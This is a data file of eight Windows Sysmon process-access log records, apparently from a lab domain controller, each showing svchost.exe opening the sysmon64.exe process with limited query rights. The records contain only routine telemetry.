{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2981,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2982,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2983,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2984,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2985,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2986,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2987,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2988,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
